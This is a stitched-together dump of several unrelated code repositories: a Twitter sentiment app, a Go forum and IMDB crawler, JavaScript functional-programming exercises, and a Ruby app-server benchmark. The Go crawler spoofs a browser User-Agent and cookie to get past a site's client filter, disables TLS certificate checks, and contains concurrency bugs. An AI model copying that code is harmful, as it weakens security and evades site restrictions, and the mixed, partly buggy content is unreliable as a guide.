percent = getSentiment(request.args['query'])
return jsonify({"percent":percent,"simWords":simWords,"simPercent":simPercent})
if __name__ == '__main__':
app.run(debug=True)<file_sep>import React, {useState, useEffect} from 'react';
import logo from '../../assets/logo.png';
import './Home.css';
const Home = () => {
const [search, setSearch] = useState("");
const [percent, setPercent] = useState(0.0);
const [isLoading, setIsLoading] = useState(false);
const [fillColor , setFillColor] = useState('#39F082');
const onSearch = () => {
setIsLoading(true);
console.log("Searching...");
fetch(`http://127.0.0.1:5000/api/v1/search?query=${search}`).then(res => res.json())
.then((result) => {setPercent(parseFloat(result['percent']));
if(parseFloat(result['percent']) < 30) {setFillColor("#e74c3c")}
else if(parseFloat(result['percent']) < 60) {setFillColor("#e67e22")}
else { setFillColor("#2ecc71")}
setIsLoading(false);
})
.catch((e) => {setIsLoading(false);})
}
return (
<div className="homePage">
<img className="logoImage" src={logo} alt=""/>
<input onKeyDown={(e) => { if(e.key === 'Enter'){onSearch();}}} className="searchInput" value={search} onChange={(e) => {setSearch(e.target.value)}} type="text" placeholder="Search a topic"/>
<div className="bottomContainer">
<div className="percentContainer">
{(isLoading) ? <span className="percentText">Loading...</span> : <span className="percentText">{percent.toFixed(0)}% Positivity</span>}
<div className="filledPercentContainer">
<div className="filledPercent" style={{width: `${percent}%`, backgroundColor: fillColor}}></div>
</div>
</div>
</div>
<div className="credits">Made by <span><NAME></span></div>
</div>
);
}
export default Home;<file_sep># **Twitter Sentiment Analysis**
Pulls latest/top 100 tweets on the searched topic and gives percent of Positivity on that topic.<br>
## How to run?
### Server
```
cd server
python app.py
```
### Client
```
cd client\twitter-senti
npm start
```
## Screenshots



### Note: In server directory, create .env file and add your Twitter API Bearer Key as bearerKey
## 👩💻 Author
- **<NAME>** | 6fc7b766a20cc2df58b77ff6377720335815f954 | [
"JavaScript",
"Python",
"Markdown"
] | 3 | Python | RaviMauryaHootowl/Twitter-Sentiment-Analysis | e1286c71bbb20323570bc2d1d7e67ac73b72463f | 12724f855a60590d7a6a308022ba4585fedcdd55 |
refs/heads/master | <file_sep>package crw
import "time"
type (
VozConfig struct {
TheadUrl string
NumWorker int
TimeToWrite time.Duration
}
)
<file_sep>package crw
import (
"crypto/tls"
"fmt"
"github.com/PuerkitoBio/goquery"
"net/http"
"os"
"strconv"
"strings"
"time"
)
//All function reuse form voz crawler https://github.com/lnquy/vozer
func getHTTPClient() *http.Client {
return &http.Client{
Transport: &http.Transport{
TLSClientConfig: &tls.Config{
InsecureSkipVerify: true,
},
},
Timeout: 10 * time.Second,
}
}
// Since 2018/09/01, voz added filter on go client user-agent.
// => Fake valid user-agent to bypass the filter.
func getCustomRequest(url string) (*http.Request, error) {
req, err := http.NewRequest("GET", url, nil)
if err != nil {
return nil, err
}
req.Header.Add("Cookie", "vflastvisit=1535954670; vflastactivity=0; vfforum_view=d99e85613f547374e9db4f942bf6192fb611ae2aa-1-%7Bi-17_i-1535954671_%7D; _ga=GA1.2.144936460.1535954673; _gid=GA1.2.1737523081.1535954673; _gat_gtag_UA_351630_1=1")
req.Header.Add("User-Agent", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36")
return req, nil
}
//
func getLastPageNu(url string) (int, error) {
req, err := getCustomRequest(url)
if err != nil {
return -1, fmt.Errorf("failed to init request to first page: %s", err)
}
resp, err := getHTTPClient().Do(req)
if err != nil || resp.StatusCode/200 != 1 {
return -1, fmt.Errorf("failed to crawl first page from thread: %s, %s", resp.Status, err)
}
firstPage, err := goquery.NewDocumentFromReader(resp.Body)
resp.Body.Close()
if err != nil {
return -1, err
}
pageControlStr := firstPage.Find("div.neo_column.main table").First().Find("td.vbmenu_control").Text() // Page 1 of 100
if pageControlStr == "" { // Thread with only 1 page
return 1, nil
}
lastPageStr := pageControlStr[strings.LastIndex(pageControlStr, " ")+1:]
lastPageNu, err := strconv.Atoi(lastPageStr)
if err != nil {
return -1, err
}
return lastPageNu, nil
}
func MakeDirFormTitle(url string) (string, error) {
req, err := getCustomRequest(url)
if err != nil {
return "", fmt.Errorf("failed to init request to first page: %s", err)
}
resp, err := getHTTPClient().Do(req)
defer resp.Body.Close()
if err != nil || resp.StatusCode/200 != 1 {
return "", fmt.Errorf("failed to crawl first page from thread: %s, %s", resp.Status, err)
}
page, err := goquery.NewDocumentFromReader(resp.Body)
if err != nil {
return "", err
}
t := page.Find("td.navbar").First().Find("strong").Text()
err = os.MkdirAll(fmt.Sprintf("%s", strings.TrimSpace(t)), os.ModePerm)
if err != nil {
fmt.Print(err)
}
if err != nil {
return "", err
}
return strings.TrimSpace(t), nil
}
<file_sep>package imdb
import "github.com/globalsign/mgo"
func ConnectDB(url string) (*mgo.Session, error) {
ses, err := mgo.Dial(url)
return ses, err
}
<file_sep>package crw
import (
"context"
"encoding/json"
"fmt"
"github.com/PuerkitoBio/goquery"
"github.com/sirupsen/logrus"
"io/ioutil"
"net/http"
"path/filepath"
"strconv"
"strings"
"sync"
)
type (
// To fan-in model
// Cary data over goroutine
PagesChanel struct {
PageNumber int
PageData *goquery.Selection
}
PostsChanel struct {
PostCount int
PostDate string
PostData *goquery.Selection
}
UrlMetadata struct {
Url string
pageNum int
}
//Cary comment and save it
Comment struct {
User User `json:"user"`
PostCount int `json:"post_count"`
PostDate string `json:"post_date"`
Cmd string `json:"cmd"`
}
//User information who post this comment
User struct {
UserName string `json:"user_name"\`
UserPage string `json:"user_page"`
Description string `json:"description"`
JoinDate string `json:"join_date"`
}
CommenttoWrite struct {
cmd []Comment `json:"cmd"`
}
)
var (
mu = sync.Mutex{}
cmtw = CommenttoWrite{}
)
func Crawler(ctx context.Context, cf VozConfig) {
lastNuPage, err := getLastPageNu(cf.TheadUrl)
if err != nil {
logrus.Errorf("can't get page number all crawler is finish %v", err)
}
pageschanel := make(chan PagesChanel, lastNuPage)
UrlChanel := make(chan UrlMetadata, lastNuPage)
go func(ctx context.Context) {
var pgwg sync.WaitGroup
for i := 1; i <= cf.NumWorker; i++ {
pgwg.Add(1)
go PageCrawler(i, ctx, pgwg, pageschanel, UrlChanel)
}
pgwg.Wait()
logrus.Infof("all page crawler is done extracting data")
close(pageschanel)
}(ctx)
postChanel := make(chan PostsChanel, 10*lastNuPage)
// restriction worker to avoid goroutine grown without control
go func(ctx context.Context) {
var postwg sync.WaitGroup
for j := 1; j <= 10; j++ {
postwg.Add(1)
go PostCrawler(ctx, j, postwg, pageschanel, postChanel)
}
postwg.Wait()
close(postChanel)
}(ctx)
cmdchanel := make(chan Comment)
urlchanel := make(chan string)
go func(ctx context.Context) {
var postwg sync.WaitGroup
for j := 1; j <= cf.NumWorker; j++ {
postwg.Add(1)
go DataExtraction(ctx, postwg, j, postChanel, cmdchanel, urlchanel)
}
postwg.Wait()
close(postChanel)
}(ctx)
go func(ctx context.Context) {
var cmdwg sync.WaitGroup
for j := 1; j <= cf.NumWorker; j++ {
cmdwg.Add(1)
go Save(j, cmdwg, urlchanel, cmdchanel, cf)
}
cmdwg.Wait()
}(ctx)
for pageidx := 1; pageidx <= lastNuPage; pageidx++ {
logrus.Infof("throwing %s&page=%d into chanel to process ", cf.TheadUrl, pageidx)
UrlChanel <- UrlMetadata{
Url: fmt.Sprintf("%s&page=%d", cf.TheadUrl, pageidx),
pageNum: pageidx,
}
}
close(UrlChanel)
}
func PostCrawler(ctx context.Context, idx int, pg sync.WaitGroup, pagesin <-chan PagesChanel, postOut chan<- PostsChanel) {
defer pg.Done()
logrus.Infof("post crawler #%d : crawling post data ", idx)
for {
select {
case <-ctx.Done():
logrus.Info("all crawler is terminated by user ")
return
case p, ok := <-pagesin:
if !ok {
logrus.Infof("post crawler done")
return
}
logrus.Infof("post crawler #%d : getting post from page %d", idx, p.PageNumber)
page := p.PageData
page.Each(func(i int, post *goquery.Selection) {
postcountstr, _ := post.Find("a").First().Attr("name")
postcountint, _ := strconv.Atoi(postcountstr)
date := strings.TrimSpace(post.First().Find("td div.normal").Last().Text())
data := post
out := PostsChanel{
PostCount: postcountint,
PostDate: date,
PostData: data,
}
postOut <- out
})
logrus.Infof("post crawler #%d : getting post from page %d done", idx, p.PageNumber)
}
}
}
func PageCrawler(idx int, ctx context.Context, wg sync.WaitGroup, pageout chan<- PagesChanel, urlin <-chan UrlMetadata) {
defer wg.Done()
for {
select {
case <-ctx.Done():
logrus.Info("all crawler is terminated by user ")
return
case url, ok := <-urlin:
if !ok {
logrus.Info("page crawler all done")
return
}
logrus.Infof("page crawler #%d extracting page:%d", idx, url.pageNum)
pageout <- DataCrawler(url.Url, url.pageNum)
logrus.Infof("page :%s done", url.Url)
}
}
}
func DataCrawler(url string, numpage int) PagesChanel {
rq, err := getCustomRequest(url)
if err != nil {
fmt.Print(err)
}
respond, err := getHTTPClient().Do(rq)
if err != nil {
fmt.Print(err)
}
Doc, err := goquery.NewDocumentFromReader(respond.Body)
if err != nil {
fmt.Print(err)
}
pageDoc := Doc.Find("table.tborder.voz-postbit")
page := PagesChanel{PageNumber: numpage, PageData: pageDoc}
return page
}
//func CheckResult(cmd chan Comment) {
// for {
// select {
// case c, ok := <-cmd:
// if !ok {
// logrus.Infof("done")
// }
// logrus.Info(c.PostCount)
// logrus.Infof("-------")
// }
// }
//}
func DataExtraction(ctx context.Context, wg sync.WaitGroup, idx int, posts <-chan PostsChanel, cmtout chan<- Comment, imageURl chan<- string) {
defer wg.Done()
for {
select {
case <-ctx.Done():
logrus.Infof("data extraction is terminated")
return
case post, ok := <-posts:
if !ok {
logrus.Infof("all crawler is done")
return
}
postdata := post.PostData
usrif := postdata.First().Find("td.alt2").First().Find("a.bigusername")
userUrl, ok := usrif.Attr("href")
userName := usrif.Text()
role := postdata.First().Find("td.alt2").First().Find("div.smallfont").First().Text()
joindDate := postdata.Find("td.alt2 table tbody tr td").Last().Find("div.smallfont").Find("div").First().Text()
user := User{
UserName: userName,
UserPage: fmt.Sprintf("https://forums.voz.vn/%s", userUrl),
Description: role,
JoinDate: strings.Trim(joindDate, ("Join Date: ")),
}
cmdstr := postdata.Find("div.voz-post-message").Text()
comnent := Comment{
User: user,
PostCount: post.PostCount,
PostDate: post.PostDate,
Cmd: cmdstr,
}
cmtout <- comnent
postdata.Find("div.voz-post-message").Find("img").Each(func(i int, imglink *goquery.Selection) {
url, ok := imglink.Attr("src")
if ok {
if strings.HasPrefix(url, "http") {
imageURl <- url
}
}
})
}
}
}
func Save(idx int, wg sync.WaitGroup, imgchanel chan string, cmdchan chan Comment, cf VozConfig) {
defer wg.Done()
dir, _ := MakeDirFormTitle(cf.TheadUrl)
logrus.Infof("save %d running ", idx)
client := http.Client{}
for {
select {
case url, ok := <-imgchanel:
if !ok {
logrus.Infof("save done")
}
logrus.Infof("image form url : %s", url)
resp, err := client.Get(url)
if err != nil {
continue
}
if resp.StatusCode/200 != 1 {
continue
}
b, err := ioutil.ReadAll(resp.Body)
resp.Body.Close()
fp := filepath.Join(dir, url[strings.LastIndex(url, "/")+1:])
err = ioutil.WriteFile(fp, b, 0644)
if err != nil {
continue
}
case cmd, ok := <-cmdchan:
if !ok {
logrus.Infof("save done")
}
j, _ := json.MarshalIndent(cmd, "", " ")
fp1 := filepath.Join(dir, fmt.Sprintf("%d-cmd.json", cmd.PostCount))
err := ioutil.WriteFile(fp1, j, 0644)
if err != nil {
continue
}
}
}
}
<file_sep>package imdb
import (
"encoding/json"
"fmt"
"testing"
"time"
)
func TestNormalizeURL(t *testing.T) {
giv := "/title/tt0111161/?pf_rd_m=A2FGELUUNOQJNL&pf_rd_p=e31d89dd-322d-4646-8962-327b42fe94b1&pf_rd_r=D70AGXBVMEB6Q7B64YY1&pf_rd_s=center-1&pf_rd_t=15506&pf_rd_i=top&ref_=chttp_tt_1"
fmt.Println(NormalizeURL(giv))
}
func TestCrawler(t *testing.T) {
start := time.Now()
Crawler()
duration := time.Since(start)
fmt.Println(duration)
}
func TestExtractDetailNonChan(t *testing.T) {
tr := "https://www.imdb.com/title/tt0111161/?pf_rd_m=A2FGELUUNOQJNL&pf_rd_p=e31d89dd-322d-4646-8962-327b42fe94b1&pf_rd_r=9BSACD527YX11PKNTZXR&pf_rd_s=center-1&pf_rd_t=15506&pf_rd_i=top&ref_=chttp_tt_1"
f := Film{
Title: "fdsds",
URL: tr,
}
ll := ExtractDetailNonChan([]Film{f})
jstring, err := json.MarshalIndent(ll, "", " ")
if err != nil {
fmt.Println(err)
}
fmt.Printf("%s\n", jstring)
}
func TestGetDocFormURL(t *testing.T) {
doc, err := GetDocFormURL("https://www.imdb.com/chart/top?ref_=nv_mv_250")
if err != nil {
fmt.Println(err)
}
fmt.Println(doc)
}
func TestMakeURLTopRate(t *testing.T) {
in := make(chan Film)
go MakeURLTopRate(in)
for {
select {
case t := <-in:
fmt.Println(t)
}
}
}
<file_sep>package imdb
type (
IMDBConf struct {
NumWorker int
}
)
<file_sep>package main
import "github.com/PhamDuyKhang/cwr/imdb"
func main() {
//t, err := time.ParseDuration("3s")
//if err != nil {
// return
//}
//cof := crw.VozConfig{
// TheadUrl: "https://forums.voz.vn/showthread.php?t=7184701",
// NumWorker: 14,
// TimeToWrite: t,
//}
//ctx, ctxCancel := context.WithCancel(context.Background())
//
//crw.Crawler(ctx, cof)
//sig := make(chan os.Signal, 1)
//signal.Notify(sig, syscall.SIGTERM, syscall.SIGINT)
//<-sig
//ctxCancel()
//crw.CrawlerPageStage1("https://forums.voz.vn/showthread.php?t=7545004")
//crw.MakeDirFormTitle("https://forums.voz.vn/showthread.php?t=7545004")
imdb.Crawler()
}
<file_sep>package crw
import (
"fmt"
"github.com/PuerkitoBio/goquery"
"strings"
)
func CrawlerPageStage1(url string) {
rq, err := getCustomRequest(url)
if err != nil {
fmt.Print(err)
}
respond, err := getHTTPClient().Do(rq)
if err != nil {
fmt.Print(err)
}
Doc, err := goquery.NewDocumentFromReader(respond.Body)
if err != nil {
fmt.Print(err)
}
//Get postcount
page := Doc.Find("table.tborder.voz-postbit")
//for each commnet
page.Each(func(i int, s *goquery.Selection) {
postcount, ok := s.Find("a").First().Attr("name") //1
//get date form page
date := s.First().Find("td div.normal").Last().Text()
if ok {
fmt.Println(postcount) //1
}
fmt.Println(strings.TrimSpace(date)) //Yesterday, 11:37
//get com form page
usrif := s.First().Find("td.alt2").First().Find("a.bigusername")
userurl, ok := usrif.Attr("href")
if ok {
fmt.Println(userurl) //member.php?u=1125
}
username := usrif.Text() //tamvatam
fmt.Println(username)
//get role Junior Member
role := s.First().Find("td.alt2").First().Find("div.smallfont").First().Text()
fmt.Println(role)
cmds := s.Find("div.voz-post-message")
jo := s.Find("td.alt2 table tbody tr td").Last().Find("div.smallfont").Find("div").First().Text()
fmt.Println(strings.Trim(jo, ("Join Date: ")))
fmt.Println(strings.TrimSpace(cmds.Text()))
cmds.Find("img ").Each(func(i int, alink *goquery.Selection) {
url, ok := alink.Attr("src")
if ok {
fmt.Println(url)
}
})
fmt.Println("---------------")
})
}
| 9dc7c099aad0568925a71ab8469049d65566e9a1 | [
"Go"
] | 8 | Go | PhamDuykhang/cwr | b91c6fdf8498492f01dc49a8594354dbbc3f9095 | a4691c9feae99d0e0ba55b3949bb12edd1b0c089 |
refs/heads/master | <file_sep>/**
* What we see is that for mutable values, updating state applies across all references to that variable.
* So changing a value in one place, changes it for all references to that object.
* For the immutable data types, we have no way of changing the internal state of the data, so the reference always gets reassigned to a new object.
*/
let obj = {
prop: 'Hello world'
}
let obj2 = obj;
obj.prop = 'I wanna change!';
console.log(obj2.prop);
console.log(obj === obj);
let array = ['1', '2'];
let array2 = array;
array.push(5);
console.log(array2);
console.log(array === array2);
let number = 16;
let number2 = number;
number = 88;
console.log(number2);
console.log(number === number2);
const PI = 3.14;
<file_sep>export const ACTION_TYPES = {
TOGGLE_FORM: 'TOOGLE_FORM',
SET_NAME: 'SET_NAME',
SET_POWER: 'SET_POWER',
ADD_HERO: 'ADD_HERO',
REMOVE_HERO: 'REMOVE_HERO',
EDIT_HERO: 'EDIT_HERO',
LOAD_DATA: 'LOAD_DATA'
}
export function toggleForm(showForm) {
return {
type: ACTION_TYPES.TOGGLE_FORM,
showForm
}
}
export function setName(name) {
return {
type: ACTION_TYPES.SET_NAME,
name
}
}
export function setPower(power) {
return {
type: ACTION_TYPES.SET_POWER,
power
}
}
export function addHero() {
return {
type: ACTION_TYPES.ADD_HERO
}
}
export function removeHero(id) {
return {
type: ACTION_TYPES.REMOVE_HERO,
id
}
}
export function editHero(editId) {
return {
type: ACTION_TYPES.EDIT_HERO,
editId
}
}
<file_sep>import { h } from 'virtual-dom';
import hh from 'hyperscript-helpers';
import { formView } from './form-view';
import { tableView } from './table-view';
const { div, h1 } = hh(h);
export function view(state, dispatch) {
return div({ className: 'card mt-5' }, [
div({ className: 'card-body' }, [
h1({}, 'Hero Generator'),
formView(state, dispatch),
tableView(state, dispatch)
])
]);
}
<file_sep>## In order to set up the project
1. Clone the project
2. cd into project-setup
3. npm install
4. npm run start
<file_sep>import { h } from 'virtual-dom';
import hh from 'hyperscript-helpers';
import {removeHero, editHero } from '../actions/actions';
const { h3, table, thead, tbody, tr, th, td, i } = hh(h);
export function tableView(state, dispatch) {
if (state.heroes.length) {
return table({ className: 'table table-striped mt-5' }, [
tableHeader(),
tableBody(state, dispatch)
])
}
return h3({ className: 'mt-3' }, 'No heroes to show');
}
function tableHeader() {
return thead({}, [
tr({}, [
cell(th, '', 'Name'),
cell(th, '', 'Power'),
cell(th, '', 'Actions')
])
])
}
function cell(tag, className, value) {
return tag({ className }, value);
}
function tableBody(state, dispatch) {
const rows = state.heroes.map(hero => row(hero, dispatch))
const rowsWithTotal = [...rows, totalRow(state.heroes)]
return tbody({}, [
rowsWithTotal
]);
}
function row(hero, dispatch) {
const { id, name, power } = hero;
return tr({}, [
cell(td, '', name),
cell(td, '', power),
cell(td, '', [
i({ className: 'fas fa-edit pointer', onclick: event => dispatch(editHero(id)) }),
i({ className: 'fas fa-trash-alt pointer', onclick: event => dispatch(removeHero(id)) }),
])
])
}
function totalRow(heroes) {
const totalPower = heroes
.map(hero => hero.power)
.reduce((acc, next) => acc + next, 0);
return tr({}, [
cell(td, '', 'Total: '),
cell(td, '', totalPower),
cell(td, '', ''),
])
}
<file_sep>import './styles.scss';
import { app } from './app/app';
import { view } from './app/view/view';
import { initialState } from './app/state/state';
const rootNode = document.querySelector('#app');
app(view, rootNode, initialState);
<file_sep>import { ACTION_TYPES } from '../actions/actions';
export function update(action, state) {
switch(action.type) {
case ACTION_TYPES.TOGGLE_FORM: {
const { showForm } = action;
return { ...state, showForm: showForm };
}
case ACTION_TYPES.SET_NAME: {
const { name } = action;
return { ...state, name };
}
case ACTION_TYPES.SET_POWER: {
let { power } = action;
const powerFormatter = compose(defaultTo, parseInt);
power = powerFormatter(0, power);
return { ...state, power };
}
case ACTION_TYPES.ADD_HERO: {
const updatedState = state.editId === null ? add(state) : edit(state);
return updatedState;
}
case ACTION_TYPES.REMOVE_HERO: {
const { id } = action;
const heroes = state.heroes.filter(hero => hero.id !== id);
return { ...state, heroes };
}
case ACTION_TYPES.EDIT_HERO: {
const { editId } = action;
const heroToEdit = state.heroes.find(hero => hero.id === editId);
const { name, power } = heroToEdit;
return { ...state, editId, name, power, showForm: true }
}
default: {
return { ...state };
}
}
}
function add(state) {
let { id, name, power, heroes } = state;
heroes = heroes.slice();
heroes.push({ id, name, power });
id = id + 1;
return { ...state, id, name: '', power: 0, heroes, showForm: false };
}
function edit(state) {
const { editId, name, power } = state;
const heroes = state.heroes.map(hero => {
if (hero.id === editId) {
return { ...hero, name, power };
}
return hero;
});
return { ...state, heroes, name: '', power: 0, editId: null, showForm: false };
}
function defaultTo(defaultValue, value) {
if (value === undefined || isNaN(value) || value === null) {
return defaultValue;
}
return value;
}
function compose(fn1, fn2) {
return (...args) => {
return fn2(fn1(...args));
}
}
<file_sep>const dragonsString = '<NAME>';
const length = pipe(split, getLength, multiplyBy2)(dragonsString);
const getLengthAndMultiplyBy2 = pipe(split, getLength, multiplyBy2);
const length2 = getLengthAndMultiplyBy2(dragonsString);
length2
length
function pipe (...fns) {
return arg => {
return fns.reduce((acc, curr) => {
return curr(acc)
}, arg);
}
}
function getLength(array) {
return array.length;
}
function split(string) {
return string.split(', ');
}
function multiplyBy2(val) {
return val * 2;
}
<file_sep>### In order to start the counter-reworked and heroes-reworked:
1. cd into each directory,
2. npm install
3. npm start
### The rest of the files can be run with node.js ( ex: node currying/index.js )
Enjoy<file_sep>// expected output: [1, 2, { p: 4 }, 1, 2, 3, 3, 4, 5, 10, 1, 2, 'poop']
const collection = [1, 2, { p: 4 }, [1, 2, 3], [[3, [4, 5]]], [[[[[10]]]]], [[1],[2]], 'poop'];
function run(array) {
return array
.reduce(destructure, []);
}
function destructure(acc, curr) {
if (Array.isArray(curr)) {
return [...acc, ...curr.reduce(destructure, [])];
}
return [...acc, curr];
}
console.log(run(collection));
<file_sep>import { diff, patch } from 'virtual-dom';
import createElement from 'virtual-dom/create-element';
import { update } from './update/update';
export function app(view, rootNode, initialState) {
let state = initialState;
let currentView = view(initialState, dispatch);
let node = createElement(currentView); // <----- create a vitual dom node
rootNode.appendChild(node);
function dispatch(action) {
state = update(action, state);
const updatedView = view(state, dispatch);
const patches = diff(currentView, updatedView); // <------ create a diff between current view and updated view
rootNode = patch(node, patches);
currentView = updatedView;
}
}
<file_sep>export const initialState = {
id: 0,
name: '',
power: 0,
showForm: false,
editId: null,
heroes: []
}
| dce097b57e3680e66379572a8e938ecdb245c9a7 | [
"JavaScript",
"Markdown"
] | 12 | JavaScript | groszwilhelm/functional-programming | 44339d8307b10cd91cca3ab129d5c4957c41b0bc | f7f2ead4831dbe84804a196b6b04891704d58c41 |
refs/heads/master | <repo_name>abdiawali/final<file_sep>/model/record.js
module.exports = (sequelize, DataTypes) => {
var Record = sequelize.define('Record', {
subject: {
type: DataTypes.STRING,
}, when: {
type: DataTypes.STRING,
}, howLong: {
type: DataTypes.NUMBER,
}, style: {
type: DataTypes.STRING,
}
})
Record.sync({force: true}).then( () => {
console.log('synced table')
})
return Record
}<file_sep>/models/records.js
//map database table for the records
'use strict';
module.exports = (sequelize, DataTypes) => {
const Record = sequelize.define('Record', {
subject: DataTypes.STRING,
when: DataTypes.STRING,
howLong: DataTypes.FLOAT,
style: DataTypes.STRING
})
Record.sync({force: true}).then( () => {
console.log('synced table')
})
Record.associate = function(models) {
// associations can be defined here
};
return Record;
}; | 7d4bdd5dc83b8a46656228caa13184004f98bc36 | [
"JavaScript"
] | 2 | JavaScript | abdiawali/final | 2109fffa97bd468f342ac17b6d29f4e051a7831f | 04c5b8ef2c48194febbf12829984d8a6222c4a0b |
refs/heads/master | <repo_name>Aboutique1/Project3<file_sep>/p-3/src/contactUs.js
import React from 'react';
// import './App.css';
import ContactUsForm from './ContactUsForm';
function ContactUs() {
return (
<div className="App">
<h2>Contact Us</h2>
<p>Shoot us an email...</p>
<ContactUsForm />
</div>
);
}
export default ContactUs;
<file_sep>/p-3/src/App.js
import React from 'react';
import {
BrowserRouter as Router,
Switch,
Route,
Link
} from "react-router-dom";
import { Navbar, Nav } from "react-bootstrap";
// import logo from './logo.svg';
import ContactUs from './contactUs';
import About from './about';
import './App.css';
function App() {
return (
<Router>
<Navbar bg="dark" expand="lg" fixed="top">
<Navbar.Brand>
<Link to="/">Got it Made</Link>
</Navbar.Brand>
<Navbar.Toggle aria-controls="basic-navbar-nav" />
<Navbar.Collapse id="basic-navbar-nav" className="justify-content-end">
<Nav>
<Nav.Link>
<Link to="/">Home</Link>
</Nav.Link>
<Nav.Link>
<Link to="/about">About</Link>
</Nav.Link>
<Nav.Link>
<Link to="/contactus">Contact Us</Link>
</Nav.Link>
</Nav>
</Navbar.Collapse>
</Navbar>
<div>
{/* A <Switch> looks through its children <Route>s and
renders the first one that matches the current URL. */}
<Switch>
<Route path="/about">
<About />
</Route>
<Route path="/contactus">
<ContactUs />
</Route>
</Switch>
</div>
</Router>
);
}
export default App;
| b244c45062643891947903cbd91e11d023bff231 | [
"JavaScript"
] | 2 | JavaScript | Aboutique1/Project3 | 218f4596c0cfe3184cd04c234c05c3dd4a4595bf | fa5f7f15ab29d3cc01588aa8011093815bf2d424 |
refs/heads/main | <file_sep>package br.com.bancooo.model;
import java.util.ArrayList;
import java.util.Date;
import java.util.List;
public class Cliente {
private String cpf;
private String nome;
private String telefone;
private String sexo;
private String naturalidade;
private Date nascimento;
private List<Endereco> Endereco = new ArrayList<Endereco>();
private br.com.bancooo.model.Endereco Endereco;
public String getCpf() {
return cpf;
}
public void setCpf(String cpf) {
this.cpf = cpf;
}
public String getNome() {
return nome;
}
public void setNome(String nome) {
this.nome = nome;
}
public String getTelefone() {
return telefone;
}
public void setTelefone(String telefone) {
this.telefone = telefone;
}
public String getSexo() {
return sexo;
}
public void setSexo(String sexo) {
this.sexo = sexo;
}
public String getNaturalidade() {
return naturalidade;
}
public void setNaturalidade(String naturalidade) {
this.naturalidade = naturalidade;
}
public Date getNascimento() {
return nascimento;
}
public void setNascimento(Date nascimento) {
this.nascimento = nascimento;
}
public void ListaEnderecos(){
for (Endereco endereco: this.Endereco){
System.out.println("Endereço");
System.out.println("Cep: " + endereco.getCep());
System.out.println("Logradouro: " + endereco.getLogradouro());
System.out.println("Numero: " + endereco.getNumero());
System.out.println("Complemento: " + endereco.getComplemento());
System.out.println("Cidade: " + endereco.getCidade());
System.out.println("UF: " + endereco.getUf());
}
}
}
<file_sep># BancoOO
Projeto academ banco financeiro
| 8d6852cad4db797850aa5c23926bbe09e6bc92b7 | [
"Markdown",
"Java"
] | 2 | Java | HenriqueMoreira4/BancoOO | f34aaa493ca85ff46701eb17b5741ec85cf1d7bf | 65d7368301ca7d1cdabdacc22aa2714f4e359453 |
refs/heads/master | <file_sep># --
# basic sinatra app to do three things:
# * tell you what app server is running this code (/server)
# * compute pi to 10,000 decimal places as a pseudo-task to fake real work
# * do a twitter search, simulating network wait
class AppServerArena < Sinatra::Base
get '/' do
index
end
get '/server' do
server
end
get '/pi' do
pi
end
get '/sleep' do
do_sleep
end
get '/random' do
do_random
end
get '/active_record' do
do_active_record
end
private
def do_random
num = 1 + rand(10) # random number b/t 1 and 10
case num
when 1..5
server
when 6..7
do_sleep
else
pi
end
end
def do_sleep
sleep 1
erb :sleep
end
def server
# Figure out which app server we're running under
@current_server = app_server
# Set the request and response objects for page rendering
@request = request
@response = response
erb :server
end
def pi
@pi = calc_pi(5_000)
erb :pi
end
def index
erb :index
end
def do_active_record
@users = User.all
erb :active_record
end
def twitter_consumer
creds = YAML.load_file(File.join(File.dirname(__FILE__), 'config', 'twitter.yml'))
consumer = OAuth::Consumer.new(creds["consumer_key"], creds["consumer_secret"],
{
site: 'https://api.twitter.com',
scheme: :header
}
)
token_hash = { oauth_token: creds["oauth_token"], oauth_token_secret: creds["oauth_secret"] }
return OAuth::AccessToken.from_hash(consumer, token_hash)
end
def app_server
# Figure out which server we're running under
["Rainbows", "Puma", "Thin", "Unicorn", "PhusionPassenger", "Rhebok"].each do |s|
if Module.const_defined? s
return s
end
end
# No return yet, push out nil because we don't know the app server.
return nil
end
# These two methods are to be used for a semi-computationally expensive task,
# simulating real wock without the loss of control that would come from
# abdicating control to IO (e.g. database, HTTP API, file access, etc.)
# Found at stack overflow:
# http://stackoverflow.com/questions/3137594/how-to-create-pi-sequentially-in-ruby
def arccot(x, unity)
xpow = unity / x
n = 1
sign = 1
sum = 0
loop do
term = xpow / n
break if term == 0
sum += sign * (xpow/n)
xpow /= x*x
n += 2
sign = -sign
end
sum
end
def calc_pi(digits = 10000)
fudge = 10
unity = 10**(digits+fudge)
pi = 4*(4*arccot(5, unity) - arccot(239, unity))
pi / (10**fudge)
end
end
<file_sep>load :rack, :self_signed_tls, :supervisor
rack 'benchmark.local', :self_signed_tls
<file_sep>worker_processes 5
listen 3000
<file_sep>#!/bin/sh
sudo unitd --control 127.0.0.1:8080
curl -X PUT --data-binary '{ "listeners": { "*:3000": { "pass": "applications/ruby_app" } }, "applications": { "ruby_app": { "type": "ruby", "working_directory": "/home/yaginuma/program/ruby/app-server-arena", "script": "config.ru" } } }' http://127.0.0.1:8080/config
<file_sep>source 'https://rubygems.org'
gem 'sinatra'
gem 'json'
gem 'oauth'
gem 'rails'
gem 'sqlite3'
group :development, :test do
gem 'byebug'
end
group :app_servers do
gem 'puma'
gem 'unicorn'
gem 'falcon'
gem 'iodine'
end
<file_sep>require 'sinatra/base'
require 'yaml'
require 'oauth'
require 'json'
require 'logger'
require 'active_record'
require_relative 'user'
Bundler.require(ENV['RACK_ENV'] || :default)
ActiveRecord::Base.establish_connection(adapter: 'sqlite3', database: 'tmp/db')
ActiveRecord::Base.logger = Logger.new(STDOUT)
require './app.rb'
run AppServerArena
<file_sep>#!/bin/sh
# passenger / puma / raptor(passenger 5) / rhebok / thin /unicorn
SERVER=puma
THREAD=10
CONNECTION=100
DURATION=3s
rm -rf result/${SERVER}
mkdir result/${SERVER}
wrk -t ${THREAD} -c ${CONNECTION} -d ${DURATION} http://localhost:3000/sleep > result/${SERVER}/sleep.txt 2>&1
wrk -t ${THREAD} -c ${CONNECTION} -d ${DURATION} http://localhost:3000/pi > result/${SERVER}/pi.txt 2>&1
wrk -t ${THREAD} -c ${CONNECTION} -d ${DURATION} http://localhost:3000/server > result/${SERVER}/server.txt 2>&1
wrk -t ${THREAD} -c ${CONNECTION} -d ${DURATION} http://localhost:3000/random > result/${SERVER}/random.txt 2>&1
wrk -t ${THREAD} -c ${CONNECTION} -d ${DURATION} http://localhost:3000/active_record > result/${SERVER}/active_record.txt 2>&1
<file_sep>max_threads_count = 5
min_threads_count = max_threads_count
threads min_threads_count, max_threads_count
